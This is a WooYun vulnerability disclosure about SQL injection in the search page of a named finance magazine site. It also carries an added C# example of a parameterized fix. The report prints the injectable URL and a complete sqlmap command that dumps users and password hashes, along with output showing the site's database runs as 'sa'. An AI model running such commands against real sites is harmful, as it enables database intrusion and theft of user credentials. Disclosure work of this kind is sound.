Vulnerability summary

Defect ID: wooyun-2015-0153741

Title: SQL injection vulnerability in 理财周刊 (DBA privileges / sa password leak / 400,000 user records exposed / 200,000 system records exposed)

Vendor: 理财周刊 (moneyweekly.com.cn)

Author: 路人甲

Submitted: 2015-11-26 14:47

Fix deadline: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 10

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-11-26: Actively contacting the vendor and waiting for the vendor to claim the report; details not publicly disclosed
2016-01-11: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection vulnerability in 理财周刊 (DBA privileges / sa password leak / 400,000 user records exposed / 200,000 system records exposed)

Detailed description:

The `title` parameter of the search page is injectable. URL: http://www.moneyweekly.com.cn/frontpage/MoneyWeekly/search.aspx?title=%E6%9C%9F%E8%B4%A7

The sqlmap run used for the report:

python sqlmap.py -u "http://www.moneyweekly.com.cn/frontpage/MoneyWeekly/search.aspx?title=%E6%9C%9F%E8%B4%A7" -p title --technique=BEU --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Database: moneyweekly
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.UserTab | 404993 |


Database: master
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| sys.messages | 98318 |
| sys.sysmessages | 98318 |

Proof of vulnerability:

current user:    'sa'
current user is DBA: True
database management system users [4]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa
[*] spider
database management system users password hashes:
(The report continues with per-table row counts for the ReportServerTempDB, ReportServer, master, moneyweekly and msdb databases, as enumerated by sqlmap's --count; the relevant figures, dbo.UserTab with 404993 rows and sys.messages with 98318 rows, are shown in the summary above.)

Fix recommendation:

Add input filtering.

Copyright notice: please credit 路人甲@WooYun when reposting.
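The report's finding is a search handler that builds its query from the `title` parameter and runs it as `sa`. As an added example (not code from the original report or from the site's own code base), the concatenation pattern that produces this bug is shown beside a parameterized form that closes it; the class, table and column names and the connection string are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example; ArticleSearch, ArticleTab and the Title column are assumed names.
public static class ArticleSearch
{
    // Vulnerable pattern: the user-supplied title is spliced into the SQL text,
    // so the value can change the statement the server executes.
    public static string BuildQueryVulnerable(string title)
    {
        return "SELECT Title FROM ArticleTab WHERE Title LIKE '%" + title + "%'";
    }

    // Hardened form: the value travels as a typed parameter, never as SQL text,
    // and LIKE metacharacters in the input are escaped so they cannot widen the match.
    public static DataTable SearchByTitle(string connectionString, string title)
    {
        const string sql =
            "SELECT TOP (50) Title FROM ArticleTab WHERE Title LIKE @pattern ESCAPE '\\'";

        string escaped = title.Replace("\\", "\\\\")
                              .Replace("%", "\\%")
                              .Replace("_", "\\_")
                              .Replace("[", "\\[");

        var result = new DataTable();
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Bound as NVARCHAR(200): the driver sends it out of band, not as query text.
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value = "%" + escaped + "%";
            conn.Open();
            using (var reader = cmd.ExecuteReader())
            {
                result.Load(reader);
            }
        }
        return result;
    }
}
```

The connection string should name a login that holds only SELECT on the tables the page needs, not `sa`; with that in place, a residual injection elsewhere cannot reach master, the login password hashes, or the other databases the report enumerates.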


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively declined